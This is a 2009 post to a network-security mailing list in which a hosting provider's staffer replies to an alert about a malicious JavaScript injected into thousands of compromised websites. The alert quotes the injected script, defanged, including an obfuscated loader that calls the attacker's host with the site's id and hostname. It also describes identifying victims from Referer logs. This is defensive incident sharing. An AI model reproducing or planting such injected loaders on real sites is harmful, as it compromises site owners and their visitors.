[nsp-sec] compromised websites again (crew.abnc-portal.com)
Greg Schwimer
gschwimer at godaddy.com
Mon May 11 10:11:02 EDT 2009
Thanks... digging into it right now.
=====================================================================
Hi teams,
there was a malicious javascript at
<hXXp://crew.abnc-portal.com/show.js>.
A reference to this URL has been injected into thousands of compromised
websites
like this (remove XXX) - usually before the closing BODY tag:
<!-- ad --><scrXXXipt language=javascript
src="hXXp://crew.abnc-portal.com/show.js"></scrXXXipt><!-- /ad -->
or
<!-- ad --><!-- ADS Blok v.0.3 --><scrXXXipt language=javaXXXscript>
funcXXXtion sADS(sIteId) {
var thisHome=document;
var sIteName=thisHome.location.hostname;
var adsurl='crew%2eabnc-portal%2ecom%2F';
var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));
}
sADS("CI-002643-3");
</scrXXXipt><!-- ADS Blok v.0.3 --><!-- /ad -->
For an unknown reason, the IP address for crew.abnc-portal.com has been
changed
to 88.80.216.114 on 2009-04-22.
88.80.216.114 is hosting the Swiss security blog 'abuse.ch'.
This server is not malicious and has not been compromised!
By analyzing the Referer headers from the requests for /show.js that
hit 88.80.216.114,
we were able to identify compromised websites that have the above
mentioned javascript
injected into one or more pages.
Please find attached a list of 5.079 compromised hosts that showed up
in the Referers
from 2009-05-01 until 2009-05-08.
There might be some "false positives" like google.com when users
visited a compromised
website using Google translate.
Cheers,
Thomas
=====================================================================
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________
More information about the nsp-security
mailing list